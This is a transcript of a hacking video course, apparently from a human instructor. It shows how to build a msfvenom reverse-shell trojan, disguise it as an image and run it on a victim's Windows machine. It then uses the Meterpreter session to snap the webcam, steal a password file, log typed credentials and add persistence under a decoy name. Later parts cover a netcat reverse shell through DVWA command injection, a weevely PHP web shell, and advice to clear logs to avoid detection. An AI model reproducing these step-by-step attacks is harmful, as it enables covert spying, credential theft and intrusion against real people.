Okay, in this video I am going to show you how to create your Trojan and then convert it to like an image and then move it to victim computer and then execute it and then hack the victim computer, get access to the computer, and also run some system command or any command you want. Okay, so I have done this multiple times. Again, I'm going to do this just for you, okay, so you could learn this better. So first we need to create our payload, and in here I'm going to use Venom. So let's use sudo msf venom -p means payload is for operating system Windows, interpreter reverse TCP, which is going to be using, and also Windows. The file is exe lhost. The lhost is going to be your Windows IP. Okay, if you want to use it in not in a local, okay, or in an external network, you can give your real IP or your public IP here, and then later on you need to enable port forwarding in your router. Okay, and then whenever someone's try to open this and click on your application, then they will send the things in your computer, and the router will forward it in to this to your IP, okay, to your private IP. So, and L port, which is a port, okay, you give it, I give it 444, and then O, which is the output file, it is going to be stored in this location. So I'm going to name this, let's name it, I am going to name it robot-ai.exe. so it is just a name, okay, you can name it anything you want. So now if I hit enter and then give the password, it will generate this application or this exe file for me. And now it is time to move into this folder. Okay, it is in file system, not really in home directory, so I'm going to move this and then go to home, and in here that will be generated, that is generated here, robot_ai.exe. so that is here. Now I am going to just copy this or move it to desktop, that is here, so I will just paste it. Okay, so you see I pasted here, and also I have two more things here that I need to remove them. So in here I have a file. Okay, I told ChatGPT to create me a file that I could use it to download and also execute some application, exe application for Windows. So this is providing this for me. Okay, and you can use in VS Code if you want. Okay, I used this thing, I think it is part of ChatGPT. Right now I don't have a network connection, so I used this one, okay, B2, and also I have the ChatGPT here that this can help me too. And you can search, come here into the extension and then search for ChatGPT, and then you can install it. If you want, you can tell them to execute some, to generate some kind of file like this. It was a bit different, then I modify it. Okay, I add some changes to this, and now right now it's working. And also I will give this to you, and you can find this in the resources. So in here we have something, let me give it a little example. So it is using this kind of scripting language, TOIT, something like this. And in here we have a local variable called URL. It is a list of URL. Okay, in here we are giving or providing two URL. One of them is the URL of an image, the next one is a URL of your executable file, okay, that we are going to add here now. And you need to put those two files in the same location, or in a location that whenever someone's trying to access it from other computer, they are able to access it. But for me, I put that file, one of them is here. Okay, so I need to move this from here. Let's cat it. Actually I'm going to move it in my server go to var www html and then payloads. In here I will paste it. Paste. You see robot._ai.exe is here, and also I have a JPEG image here. You see that like this, and I'm going to use this one as cover. Okay, when someone's click on this image, then my exe file will be executed. Okay, so I will show you. When you see this, you will understand this better. So in here, not here, in here, we need to, the first part is going to be that JPEG file. We need to add the link for that. So it's going to be HTTP, and then it's going to be get10.4/payload/image.jpg. This is the location of that image. Let me copy this and then paste it on my URL. Copy, paste it in my URL, and see if we get the result or not. Okay, so let's use Ctrl V and hit enter. You see that it shows me that image. That means the URL is working perfect. Okay, and also the same thing goes with the other URL that is going to be my exe file, http, you know that, okay, 10.0.2.4. For you maybe it's going to be different because of you may put this in another location. Okay, it was in robot_ai.exe, and also you can you need to copy this, okay, to make sure that it is the right URL. Come on, so copy, then move to your URL right here. Now when I paste this, and now if I hit enter, it must download this robot_ai, actually not AR, needs to be AI, and hit enter. So you see that it is completely downloaded this robot.ai, and also as you see we have AR here that need to be AI, and now it is perfect. Okay, use Ctrl S to save it, and you don't need to know all other stuff. Okay, right now actually, so in here, not here actually, in Windows, I need to rename this file again, and I'm going to change the extension to AU4 or 3 I think, and hit enter. So now we have an application now that will change this file to exe file. Okay, before we don't had it. Okay, we didn't had it, but when we install VL, that application installed in our system. So that is compile script to exe. If you search for compile script to exe, you will find it. When I hit that, you see we find it right here, and it has something like this in here. And also you need to add an icon to your this application or this exe file. I already created icon of that image. This is the image, this is the icon of that image. You see it is smaller, and this one is the real image. And you can search on Google that how to change image to ICO. You will find some online website, and they can do this for you for free. You give your image, and then you will be able to download the icon of that image. As you see, I have it right here. Okay, that I am going to use it. So what is the AU3 file location? Okay, that is in desktop, so that is this one I think. Okay, so hit open. Now I opened that, and then the exe location that you want to generate this, so I want that to be in desktop right now. So don't you can browse it from here and then select wherever you want. And also the icon, as you see right now, it is selected and in the download and then image.ico. And if you want, you can generate x64 that too. So hit convert, and immediately it just converted for me. Now I can close this. You see the file right here, and I am going to rename this again to something like robot_AI, and let's copy or cut it from here and then put it to our server, in our server. Okay, so where is our server location? Actually, I need to rename this first, and then I will be able to. Okay, first, now I'm going to paste it here, and I'm going to rename this because of we have a file by that name in our server, so it's gonna be the same name. So it is going to be final, and now I can move it into payloads. When I open this, you see we have robot.ai.exe, robot_ai_final.exe. So now I can download both of them, but I'm not gonna do that because we have this one. It looks like an image. Okay, whenever someone is opening this on Windows, actually not in Linux. So now we have this. That is good in our server. That is ready, and it is time to come here and run our MSF console. Hit enter and wait for a moment to launch, and then we can do the rest of the thing. Okay, so as you see, we used here we use reverse TCP. We used reverse TCP that needs to be used there, and also the port. Okay, we need to use it here. So let's go with this. I'm going to go a little faster. So use exploit multi handler. Okay, so let's set payload. The operating system is going to be Windows, Metaparator, and then reverse TCP this time. So let's go with options and see. Okay, the L port is good. Now it's time to lhost. Set lhost to 4. Okay, now let's exploit it, and it started reverse TCP handler on this. So it is time to go back to our Windows 10 here. You see it's already opened, and I'm going to refresh this, and after a refresh you see we have image robot.ai.exe. We don't need to download that. Okay, I'm going to download this one, so I'm going to save it and then go to download. Yes, you see we have the robot_ai final. It looks like an image. Okay, extra large icon. You see it's exactly like an image. I'm going to run this. Okay, it is actually asking something like this, and I'm going to run it to see if it is going to show me the image. Perfect, it is showing me the image. And also in here in Kali Linux, you see that we got the session opened, and now I can use help to see all the available commands here, and I can use a lot of command that you see. Okay, core command, I can use it here. I can use file system command like cd, change directory, add, delete, dir, download, and a lot of things that I will take you through some of them. And also I can use webcam snap here that will take a picture, okay, using the webcam. But first of that, let's see if it has some webcam available or not. So I'm going to use webcam_list. Hit enter. As you see, it has a VirtualBox webcam, laptop, integrated webcam, E4HD. Good. And I am going to take a picture right now. Okay. And let's webcam_snap. Now if I hit enter, it will take a picture, but let me turn on my phone, and then I'm going to put this in front of the let's see, I'm going to put this in front of the webcam so you will see that. Okay, so right now I'm going to hit enter. Starting. Okay, right now you see that image right here. Okay, NetHunter Kali, that is the image, and also it took a picture, and as you see the camera is kind of weak, and also right now it is in the night, during the night, so it's like this. So congratulations, so you are now able to, you know, get the system, okay, and also control it. And if I use dir, you see we have all the files here. If I use ps, you see we have all the processes that is running right now. And also in here maybe we will be able to find our own application that is running right now. If I search it, I will be able to find it. Okay, it was, I think, robot_AI, so I need to search for RO. Come on. I don't know if I am able to find it or not. So if you find it, we can do something, okay, to hide it from here. If someone in Windows, they open this thing and they will see that something's happening, okay, and someone is running an application in some, for example, in this location, and if they go and delete that file, then our connection will be lost. So I will go and take you through them in the next lectures. Okay, in this video I am going to show you how to upload a file into the target system, and also how to download any kind of file from the target system. Okay, so here I already have the session, Metasploitable session. In the previous video I showed you how to get this, okay, and I have done this multiple times. Now it must be very, very clear for you to do this. And for me right now, if I use ls, you see that we are into C drive user name it, and then download folder. And then when I use ls, you see we have two files here, one of them desktop.ini, and also we have robot_AI_final. So right now if I download or upload anything, okay, if for example right now I'm trying to download something, it will be downloaded in my right here, okay, in my Kali, in this location, okay, home/Kali. And also if you want to upload something, you must put your file right here, and then you can upload it by giving its name. So now if we came back right here, for example, I'm trying to upload something. Let's see if we have anything. Okay, we have one here, an image, okay, that is one.jpg. So I want to upload this, and if I just use help here, and let's see if it is giving me some kind of command to upload something or not. Okay, we have commands here, shut down, okay, suspend, we don't use that. Okay, we have something, okay, we have download here, and how about upload? Okay, we have upload and download, okay, and these two commands is the commands that I'm going to use here. So let's I'm going to upload this file into my target system. Just imagine it's going to be some kind of harmful or something that they don't want to be in their computer, and you want to send it to their computer. So I just use upload and then 1.jpeg and hit enter. You see that completed, and right now if I just use ls, you see that we have 1.jpeg right here. And if you don't need this, you can delete this. Also, you see the modes here that is readable and writable right now. Okay, so if you want to delete it, just use del and then 1.jpeg and hit enter. And now if I use ls, you see that that is gone. Okay, imagine I'm going to download something. Okay, let's go to Windows machine and let me just upload this once again and come to here and try to open this. You see that that is here. Okay, that 1.jpg, and it is our application robot_ai_final, and that one. Okay, so now I'm trying to create a new file here. Let's make this some secret file. For example, it is going to be passwords. Okay, and inside this, imagine I have a lot of password. For example, my secret password or my social media password that is here, for example. Okay, and look at this one. I'm going to save it and then I'm closing it. Now I am going back to my Kali machine that is here, so I use ls, and you see that wow, we have something called password.txt, and I'm imagining that it is going to be very, very important. So I need to read inside this. Okay, I use cat password.txt and hit enter, and you see that we can read the details that is inside that file, and I see, wow, it is very, very important for me. So I need to download this. So you just use download and then password.txt and then hit enter. So it will be downloaded by the name of password.txt in home Kali and then password.txt. So if I came right in here, you will see I have a file here called password.txt, and you see that everything's here now. And I think this is a very, very cool that we can use it. Okay, and also you can, if you want more and more, you can use help, and you can come right in here and start searching for something very good, okay, that you really need, and you can use it. And also, as you see, we have system command. This will shut down the remote computer. I don't want to shut down this. How about this? Suspend or resume a list of processes. No, I don't want that. Shell, drop into a system command shell. Let's try to use this one, shell, and let's see what's happened. Okay, as you see right now, I am into into shell. Okay, before we were in Meterpreter, now we are in shell, and I can do a lot of things here. You see I can dir, and when you're in shell, that means you have the full access to that computer, so you can do whatever you want. Okay, you can download, you can upload files, you can delete files, you can whatever you want. Okay, you can boot it, you can reboot it, and so when I'm telling you have full control, that means you have full control. Okay, so that is it for this video. Actually, well, in this video I am going to show you one of the coolest thing that we can do with this session. So let me use help and show that for you. That is key scan dump and key scan start. So it will start capturing the keystrokes, and then dump will give it back to you when it is stored into a buffer. So that means you can get each key that the person is pressing. So it is very important. Okay, this part is very important. We can do this in a public internet or in a public network, even if your target is not in the same network with you. And we can do this with the help of this backdoor that we generated. Even a person is not in your country, if he's in another country, you're in another country, you can do this all to him, but you need to enable port forwarding in your router to forward everything that gets from there, and redirect those packets into your private IP. You need to configure this in your router. So now in private network we are going to do this, and it's the same as in public network is also the same. So here we just need to use keyscan underscore and then start. So as you see right now, starting the keystroke sniffer. So if I go back to, for example, right in here, imagine I am trying to go to facebook.com and I am trying to type my username and my email, and then I'm trying to log in. So you will see that how we can capture those things. And also that Facebook, they are using high security, that we are not able to capture their data, but using this keyscan start we can capture things like that. So I'm going to go to my IP, and I have in my website here as this one. Okay, so in here I need to give my IP, for example my email. Imagine my email is namet@gmail.com, and then heading tab. In password I will give some password here and hit enter. So you will see that we are not going to log in here, but in here when I came back, if I use keyscan underscore dump and hit enter, you will see that we got all this stuff. Okay, the first one is that we got this one, and we had something in buffer, so it will it just automatically completed the URL, and then I hit enter to search for that, and then I typed namat and then right shift, okay, to hit this @ okay, and then gmail.com, and then hit tab, and then 1 2 3 and all this thing, and at the end I pressed enter. So like this, you see we are able to get everything we want. Okay, we are able to do this. And also in the same time, if you want to get a screenshot of this, you can just use screenshot and hit enter. So it will take a screenshot and then store it into home and then Kali. If I came right in here, you will see that we just got it. I think that is this one. You see that? That is here. That is already opened. Screenshot of the that thing. Okay. Now imagine if I go to, for example, in this location, and I try to get a screenshot. Hit enter. What happened? I don't know. Let's see if we got something here. Okay, you see we are able to get this screenshot like this. So okay, that is the same as this one. Okay, it is cool, isn't it? Of course it is. Okay, in this video I am going to show you how to make your session more sustainable. What does that mean? That means you need to do something with your session or with your payload to make it more sustainable. That means whenever the target understand or find out that someone is spying on him, and he deletes your application or your program and then your payload, and then restart his computer, and when he's back you will have the connection back, you will have your session back. So we need to do this, okay, and it is kind of very necessary. When you get the connection, you need to do this immediately. Okay, so in here I'm going to show you that. So right here, let me go to Kali, and as you see right now, we are into this. We had a session right now, okay, pwd. So you see we got the session and we are into Windows mission right now. So you may remember something that I already told you, that was a command called background. Let me show you that right here. So now it has a very good usage right here that we need to use it. So I need to use background and hit enter. So now our session is not closed, okay, it is in background, and then I can go into session back by using session 1. Or yes, session 1. By using session 1 I can go back to my session. But now in here I need to use other thing like, you know, persistence. So let's use that here. I'm going to use exploit /windows/ again it's gonna be, I think, local, and then in here it is persistence. Let's come right here and hit the tab. If it's completed itself, so we will be good to go. If not, okay, persistence, and hit enter. So it gives me an error. That means we got some kind of error, some kind of misspelling in here. That is somewhere in here. So as you see, we got an extra space right in here that needs to be removed. Okay, the number 0, we are going to use the number 0, and as you see we have all other options as well. So hit enter. You see that to Windows Metasploitable TCP. Okay, so no payload, configure defaulting to Windows Metasploitable reverse TCP. Rank is excellent. Installer, persistent installer. Okay. Now if I just use show options, okay, you know, right now you're using it, and now that I use show options, you see we have some kind of details right in here, and also the payload options for this one, which are, you know, the last session that we had here, and also we have some other stuff here that we can add extra thing in here. So we have something required as in delay. So this delay is going to be some second after the person is restarting his computer. For example, after 10 seconds or 20 seconds, you can change this. And also the path, the exe name, the regular name, reg name, sorry, not regular, and session, as you see, it is, you know, required, and also the startup user is also required, that we need to add some of them. So the thing like exe name that you see here, I am going to, of course it's not, you know, mandatory, so I'm going to add something here. So use set exe underscore name, and I am going to add a name to this that my target never suspect that. So it is going to be, for example, Windows Explorer. Okay, Windows Explorer.exe, and hit enter. So right now that is set to that one. The next one is, as you see, the session, it is mandatory to set, so we can use set, and then session is going to be to 1. And the next thing is, so now if I just use show options, you will see that this thing that we wanted is now completed. Okay, we don't need all other stuff here, but also I need to do one more thing, and the things that I have never done it before with you, and that is to use show add once, not add once like this. What was that? Show add once, invalid parameter. Okay, we got something in here, some kind of error add once. Okay, we need to fix this. Okay, as you see, we have in show add once, before I didn't type the D, so it was giving me that it is not, invalid parameter, something like that. So in here you see we have a lot of things that we can change them. Okay, that these are not, some of them are not mandatory required, some of them are required, and we can change them. And the thing I want to change is this one, exe custom. So what is this mean? Use a custom exe instead of automatically generating a payload exe. So if you have already something in here, then you can use this. Okay, if you don't have it, you can forget it, because it is not mandatory to do this, but I am going to do this. So let's copy this, and I am going to use set and then paste this thing here, which is exe custom. After that, you need to give your location, which was, for me it was var and then www and then html, and then I think it was in payload, and name of your payload, that is robot_ai.exe. and let me see that once again, www payload robot_ai. okay, robot_ai, and this one, this is not a payload. Okay, it is just like an image that will download my real payload that is here. Okay, don't count this as a payload. So, and after that we can hit enter. Now you see that exe custom is set up, and after that we can use the exploit. Let's see, exploit this and see what is going to happen. As you see, everything is successfully done, and now you see we are into Windows local persistence. Now again I can use the exploit /multi/handler. You see we are back in our multi-handler, and if I see my options, you see I still have my settings here. Okay, that is good. And if I use back or just set my things like payload, Windows, what was that, meter operator, and then reverse_tcp, and if I use exploit, so right now it will start doing the exploit. But in here you see that we have done, or we just injected our thing into the session. And before doing exploit, I need to go back right in here, and I'm going to restart this computer. Okay, just like a simple or a normal user, restart it. Sometimes it is working and sometimes maybe it's not gonna work. Don't be worried about this. Okay, I just didn't delete it, just have done it, and you see it is date now. Let's see if when we restart it, are we going to get it back or not. Maybe it is because of that 10 seconds that we are not get the session back. If you get it, so good. If you didn't get that, no problem. So I'm going to pause the video, it's going to take some time. Okay, I am back now, and let's come back here and hit enter, and I'm going to use options here, you see everything is set up still, and I'm trying to exploit this, and it is starting reverse TCP handler on this thing, and let's see if it is going to get the connection back or not. We need to wait a moment until the connection is back, okay? And it is not completely ready right now. By open CMD, now if I just ping that, okay, we don't need to ping that, okay? Actually, you see now the connection is back, and you see that we got meter precision to open on this one. And now if I just go with PWD, and you see that we're into the Windows system, okay? And you know, that is very cool, isn't that? Of course that is cool. And if I just write PS, and you will see that we are having our all processes right in here, that you can see them all very good, okay? So you see name of the processes, and you see the path that is located. Let me see if I can find that robot_AI into this location somewhere in here, and I am not able to find that. Okay, if you find it so good, you can hide it from here too. If not, then that is okay. So right now you see we just met it done, okay? Now that we restarted our computer, and still we have the session, okay? Now whenever this person turn off his computer, and after some time he turn on it back, and still we have the connection, okay? So thanks for watching, and I will see you in the next video. Ethical hacking steps. Every ethical hacker, and also every penetration tester, everyone who is doing this job, even as a freelancer, or even they are working for a company, for a penetration tester, as a penetration tester, they need to follow these 6 steps, okay? The first one, reconnaissance and scanning, identifying vulnerability, gaining access, maintaining access, reporting. And actually we have done it a lot of them, and I've done it many times, and also I am going to explain them here for you. So if you're a penetration tester or an ethical hacker, you need to do this, even if you're doing this as a freelancing job. So reconnaissance means gathering information passively. What does that mean? That means you're not going to go to company to ping the system, or to go start hacking it or start scanning it, okay? Actively, you're not going to do that. When you select your goal, when you select the target, you start gathering information, searching on Google, for example, asking people, and gathering some information, and the owner of the company or the owner of the website will not understand that you are doing this. This is called reconnaissance. The second one is scanning. Scanning means actively start gathering the information. So we have done this many times using Nmap, using Zenmap, using like NetDiscover, and also a lot of other tools that we just use. And also in the future we are going to use much more tools. You will be familiar with each of them. And also we have Nessus beside Nmap. Nessus is kind of paid software that we are not going to use. Maybe we will not use, okay, no problem. And in scanning part, you go actively start scanning the system. So maybe the owner of the system will understand this, okay? Maybe not. The next one is to find the vulnerability, okay? Identifying vulnerability. So after scanning, so the result of the scan is going to be a vulnerability. Okay, you find a vulnerability, and inside that vulnerability you are searching within for example in a database, and also the most attention must be on the details, okay, like operating system version, like ports version, like open ports, and a lot of other stuff that we can find them and we can use them in many cases. And also we just did it in the past, okay, you know how to do this. And the next one is to gaining access. So in gaining access, we are going to use the vulnerability that we just find. We're going to use those vulnerability to gain access to the system. And also there are tools that we can use them, like Metasploit. In the past we used it, and then by using Metasploit we open a session, and with using this open session we can upload, we can download files, we can bring changes to the system, we can have access to their cameras, we can have access to their, for example if it's Android, we can send messages, we can call it, we can get all the messages, we can get all the contacts, and like these things that we can do this. And after that we get the access, then we need to maintain the access. So how can we do that? In the past again we did this, and it is about sustaining the session. We use persistence, and also there is other thing we can do, like migration. Migration is just a part, okay, it's a small part that we can do, like we can migrate our session or our process with some other process when the victim suspect and they can try to find the payload and try to delete that. They will not be able to find it because we migrated with something else. So now that you sustain the session, now that you're trying to maintain the access, it is coming to reporting. So after all the jobs done, okay, when you finished completely, now it is time to exit. When you're trying to exit, when you're trying to go out, you need to delete the logs, okay, clear the logs, and then prepare the reports and then present it to the person who you're doing the job for. And in deleting the logs, it is because of being secure on internet, okay, and it is because of not to be found, okay. So you clear the logs, that if someone's later on tomorrow came and tried to see the logs, oh my god, nothing happens at all. Or they found that something happens and they come to check the logs, they see that the log is gone, okay, so they will not be able to find you some days, okay. And it is one step of this 6th step, and it's the last one. So if you're if you're a penetration tester, or if you're doing this as freelancer job, you need to follow this all step, okay, to complete the job. So okay, today I am going to show you how to use this Netcraft. Actually, this Netcraft is an online platform that allow you to give a link, give a website to this, and it will start searching about that website, and it will give you a report of that website, okay, and it will give you all the details that is online, and it is not illegal because it is online and everyone can see that. So it will put that in a good format and then give it to you so you can use it. And in here, if you came to search Netcraft, okay, www.netcraft.com, so you will be coming in this website. You see it has a very good website, and you can see a demo of this and also all the information that is here. But the thing we need to go through is this part. What's that site running? Discover the web technologies and internet infrastructure powering any site. So you give that here, and I'm going to go to this website, movie.gov.af. okay, and I'm going to hit analyze, and it is going to take some time. You need to wait, and after it is completed, it will show you a very good result of that. So right now you see we have site report for this website, and you see it is coming right here. So about the background, it is network, the background, so you see site title, this is the site title, and then site rank, and also date first seen, it was in January 2019, and also Netcraft risk rating, it is 1 out of 10. That means it doesn't have any kind of vulnerability right now, I think. And also primary language is Persian. So about its network, you see all details right here, the site, the netblock owner, and all things, and also hosting country, it's in Afghanistan right now, okay, and also its IP address, and also reverse DNS, that is right here, and also IP delegation. You can come right here and search about that, and you can see that it is located right in here, okay, in Afghanistan, and specifically it is located in this location, and that is in Kabul, okay, Afghanistan, Kabul, I think, this part. So actually this IP is telling that this IP belongs to this part, it's Afghanistan. And also it's about SSL and TLS. You see we have all information here that we need, we can use it from here. So right now the owner of this website will not understand that we are trying to get information about this website, and it is kind of passive information gathering, okay. Serial number, cipher, and also signature algorithm, and so it's about hosting history. And first it was at this one, and then it got changed in this one this year, and also last seen, you see it was in 2022. And also we got the framework and web tracker that is used here. You see them all here, like these are right in here, okay, that is used. Site technology that is used here, you can find them all in here, like the technology it is used is Apache. Now you can see that, you can understand that the server they are using, web server software, is Apache, okay. And also the server side, in the server side they are using as PHP, okay. So they are using SSL and also PHP enabled. That means they are supports PHP. They are using PHP right now. We can go and search about PHP. If they have any kind of vulnerability, then we can come back here and start exploiting on them. And also in the client side, you see they are using JavaScript, okay, jQuery UI, jQuery Bootstrap, okay. These are all the things that we can get from this website, okay. And like this, you can go with any website you want, and then it will give you the information about that website, and it is kind of public or general information that you get about your client, okay. It was about Netcraft. Have you heard of crawler? These crawler are tools that go through each files and folders, and then get some important thing and links out so we can use them. And here, as you see, we have our Metasploitable running, and here I'm going to run its IP, which is 10.0.2.6. and hit enter. Let's go with Motilde. So here I have the link that is here, and it has a lot of things that maybe I don't see that, okay? And I'm going to copy the link for this, and in here I'm going to use a tools and then get all those links out. That tools is called derp, okay? And then I will just paste this one and then hit enter and wait a moment, and then this will get all the things that I don't see, okay? You see we have a word list file that is in this location, okay, common.txt, and it generated that for me. As you see right now we have a directory that is classes, okay, we don't need that. Documentation is right in here, that is not very important. How about this one, images? Okay, good, that's also good, not really good, but okay, we have includes, we have JavaScript, okay, forget that, I don't want that. And also we have the password. See, this is going to be some cool thing. I think I am going to just copy this, and if I came right here and then paste this and then hit enter, you see we have the password.txt here, accounts.txt here, that is admin, and also okay, all the information that we need here, okay? So you see admin pass and monkey, each of them are, this may be username, this one is password, and this is maybe some information, okay, some details that is here. So like this, you see we can get the information, and also we have info PHP, we have notes, we have login, we have indexes, and if you can't find the login page of some website, you can take this one. Okay, now for example in this web page I can come right here and then see that to get the information. Also you see I get the PHP my admin register, and also we have something called robots, okay, robots, and also robots.txt. Let me just copy this one and see what do we have. Okay, this robot is kind of very important thing in websites. When you get this, you will get something like this, like this. You see we have some of these that are not allowed to be accessible. For example, config, okay, classes, JavaScript, OWASP, documentation, and also password. These are the things that is not allowed to be accessed, but sometimes user or the person or the developer forget that to configure it successfully or configure it. So if you use this, then you can access that. So as you saw, we just use the password. And also if I go try this config, may see that am I able to get this or not? Okay, you see we are successfully getting the config file as well. As you see that the username is root, the password, it doesn't have any kind of password, and also Metasploit, localhost, and like this. Okay, so this is the config file that we could get this, and you see that it is a PHP file. Okay, so what else do you want? We can use this derp file, derp thing, okay, to find things like this, and you can come right here and search for more thing if you could find it. So thanks for watching. Okay, in this video I am going to show you the code execution vulnerability and how we can find this on some websites and how we can use it. Okay, so I'm going to go to DBWA, and the username for this is admin, the password is password, hit enter, and then you can say don't save it. You see it is a website. Just imagine you are opening a website and trying to find some vulnerability, and you see right now it has a lot of option here that we can use it. Okay, and in DVWA right now I'm going to put this to low. Okay, the security to low, so we can try to hack it, and we are able to hack it. So the command execution part, in here we are able to execute some kind of command. As you see right now, it is asking me to ping for free, and in here I can ping some some websites, some anything I want. Okay, I give the IP and then it will ping it for me, for example the Google. And now I'm going to go with 10.0.2.4, which is my Kali Linux. So I ping it. As you see, it is giving me the result. That is okay. Okay, that is okay. But the thing I want is to see when I am able to run some kind of command on an input. I want to see if I am able to run some system command beside the real command that they want or not. So in here right now I am going to go with this, and I'm going to put a semicolon, and I'm going to use some system command, which is ls, and I'm going to hit enter, and it is going to wait a moment, and then you see that it gives me the result, and it ping. Okay, so it's done the job. But beside that, I also have all the directories that is located there. So now that I am able to do this, I can run system command. You know how many system command we have. Okay, you know how dangerous those system commands are. Now if I'm able to run that here, I can delete this file, I can modify it, I can read inside this, I can do whatever I want. Okay, so this is how we are going to use system command when we find some kind of vulnerability. And now I am able to hack through the system using this one. Okay, even if maybe if I'm able to upload or download something, maybe not. Okay, if we have some kind of system command like that, then we will be able to do that. And also we can go with pwd. As you see, it is giving me the list of these directories that I am located right now, that is here. And I can go with, for example, let's use city. City is a command that maybe it is not going to work, but as you see, I don't know if it is worked or not. 3 packet transmitted. So it is how it is going to work. Okay, later on we will see, and we will go with more vulnerability, okay, to find it. And it is one of the basics of vulnerability that you can find on input, okay, in any website that you are it has an input. Okay, you can give the real input, and then you can give some command, system command, and you can see the result if there is some result. Okay, for example, if it is a username and then a password, you can register your username and password, and then beside that you can send some other command to hack to the system. So if it is vulnerable, then it is going to be very, very harmful. Okay, in this video I am going to continue this command execution vulnerability, and with the help of another tools called Netcat, I'm going to hack this server. And as you see, before we were able to type the command that was 10.0.2.4, and it was giving us the result, which was pinging. Okay, and it was sending the IP to server, and then it was giving us the result. So beside that, if we search and then add a semicolon here, and then give something like pwd, hit enter, and it was giving me the result of the second command as well. So we count this, or we call this a execution command vulnerability, that now we are going to use it here to hack this. And we are going to use Netcat. Netcat is a tools that help us to listen to a port, and then it will hack to to a system. Actually, it will listen or connect to computer, and it is called netcat. We are going to use nc and then dash vv, and then we're going to listen to a port. It is going to be, as you see right here, 8080. This is a port that we are going to listen, and I'm going to hit enter here. And down there, as you see that here, I'm going to refresh it once again, and let's go back to something else, and then command execution. And I am going to go to this. Before going there, I'm going to come here to show you a simple netcat command. Okay, it is netcat and then -e. It is going to be in this file, okay, in this location b, and then sh, and then my IP address, which is going to be 10.0.2.4, and then the port that is open we are listening to, that is port 8080. Right now, this is the command that we are going to use, and also we need to just ping this, okay, like give the IP. It's going to be, for example, 10.0.2.4, and then this one, like this. This is the full command that will help us to hack that system. So I'm going to just copy this, okay, and then go to right here, and don't need to type that, and then I will just paste it here. So you see, we have our IP, and then we have the nc, which is the netcat. E means this file is located, location, and then we will give this IP, which is our own IP, and then the port, and hit submit. Before hitting submit, I want to show you that still we are listening here, and let me do this like this, and then hit submit right here, okay. You see still we are listening, and still it is loading, and we need to wait for a moment. And as you see here, we got something here, connection to this happened, okay, from this computer. Let's use pwd. You see how we got the connection, and we are in this location right now. If I use who am I, still it will say that www-data, and also if I use ID, it gives me the ID of this, and also if you use name-a, you see that it is a Linux Metasploitable, and the distribution is a server, and GNU Linux. So what else do you want? Okay, so thanks for watching. In this video, I am going to show you another vulnerability that is called upload vulnerability. This is also one of the basic vulnerability that we are going to cover it. So just imagine, like before, you have your own website like this, maybe the other website, someone else's website, and you are using it, you are testing to find some kind of vulnerability, and you come to upload, and you see that there is a part or a file input, okay, or a file upload. So in here we can upload some kind of files. So let's see, I am going to upload a file here. For example, let's see, I'm going to upload this image here, and hit open, and then hit the upload button here. As you see, the upload happened successfully, and it is located in this location. So that is okay. We are uploading an image here. Now in real life scenario, you need to modify this, or you need to configure this, you need to code this in a way that when someone's trying to upload a photo, that must be a photo, nothing else, okay. But now, right now, you see it is a JPG, that means it is an image, and I'm going to try to see if I am able to upload some other kind of file, like a PHP file or not. So let's go here and use clear here. I am going to use a program that is called Vili, and that is like this, okay, like this, Vili, something like this, and we're going to use this just like will to generate a backdoor. It is going to be a PHP file, okay, and we can use this to access to the whole system, just like we were generating our payload using VL. Okay, and we can do this very easy by using VFLE and then generate. Okay, and then we need to give a password to this. So the password is going to be 1 2 3 4 5 6. It is a password that I give. Okay, you can give a different one, you can use a different one, but for me right now it is going to be this one. And the next option is to give a name to this and then a location. For example, it is going to be into root. I'm not going to give it into root, so I'm going to just name it shell.php and then hit enter. So as you see, it is telling me that permission denied, so you need to use sudo at the beginning, hit enter, and then give the password. As you see right now that the file is generated, okay, and the size of this file is almost 680 bytes. And let's see, where is that stored? That must be a PHP file actually, and I am going to go to home, see that that is not in here as well. I think it is in root. As you see, that is in root, okay, which is it's named shell.php. I'm going to copy this and somewhere else, for example in desktop, paste it in desktop so it is easy to access it. And now I can upload this into right in here, okay, and let's see if we are able to upload that or not. Shell.php. In real life scenario you shouldn't be able to upload this, but as you see, it happened to be successfully uploaded. Okay, now I can use this shell or this file to see and get access into this. And now I can use this program again, okay, to interact with this and try to see if I am able to hack through this system or not. So now let's go, and here you see we can find that in this location. If I just copy this link and then let me, okay, not this one, not this one. Let's see, I'm trying to open this file, okay, and that is going to be in this location, hackable dbwa. I am sure that is in this location, and I'm going to paste it and then let's hit enter. As you see right now, we don't get some kind of that file not found. That means because it is a PHP file, we are able to see that. That means it is successfully uploaded. I'm going to copy the whole link from here, and okay, let me show you something else. For example, I'm going to hit this one and you see that not found. That means this file is not exist. But if I just type it completely and it is telling me nothing, that means it is successfully uploaded and it is located in this location. So now it is time to come here and start, because now we uploaded the thing in the server. Now it is time to use that. So again I'm going to use VFLE, and here I will paste the link, okay, that is in this location. And after I pasted the link, I need to give the password, okay, it was 1 2 3 4 5 and 6. And now let's hit enter and wait a moment. Maybe it will need to be as sudo, maybe not. Okay, we will wait for a moment to see the result, and you see that the result And as you see right now, we just get this successfully. So now if I use help, it is giving me the help, and it is giving me all the commands that I can use with this. Actually, it is going to be the Linux command. Okay, if I use pwd, you see that we are located in this location, and if I use ls, I am able to list all the things, and also you see that the shell.php is also uploaded here. Okay, I can remove it, I can edit it, I can add a new file. If I use who am I, you see that we are okay. The remote script execute trigger an error. Okay, it's not giving me that. Maybe this is that. Okay, and let's see if we can make a kind of directory or not. mkdir, let's name it test. As you see, it has successfully happened to make that test for me. Okay, and if I make rm test, and you see that rm cannot remove that because it is a directory. So and now if I use ls, you see that is dropped, okay, or removed away. Now you see, by using this simple vulnerability, we can have the full access over the server. Okay, so thanks for watching. Okay, previously I showed you the file upload vulnerability execution, and we were able to hack to the system. And now it is time to move into some other thing like brute force or command execution that we did it. Let's go with file inclusion. So this file inclusions means that we have something, okay, as URL, okay, and also you see it gives you a little information here to read it. Let's read it. Okay, to include a file, edit the page which is equal to index.php in the URL to determine which file is included. Okay, we can understand that very easy. Sometimes when we have input, the input is kind of it is the method is not post, it is get. When it is get, we can use it, okay, in our own usage, in our own benefit. So as you see here right now, we have the page which is equal to include, okay, .php, and now if I remove this, okay, page in here, you see that we have a fatal error, but as you see, the file exists at this location, but we have some kind of error in this line. That is okay, that is okay. But the thing I want is here. So we have var, okay, we have www and then dww and then all the stuff that is here. Let me show you something here that is very important, and that is going to be right in here. That is let's go to city etc, or let me use this one. I want to use city ls. I want to go to city, and then want to go to home. Okay, we are in the home, I think. Let's use to go back. Now we are in the home. Okay, let's go back again. Now again, let's see. Okay, we have a file called etc. Let's use etc. That now we are in here, and we have a lot of 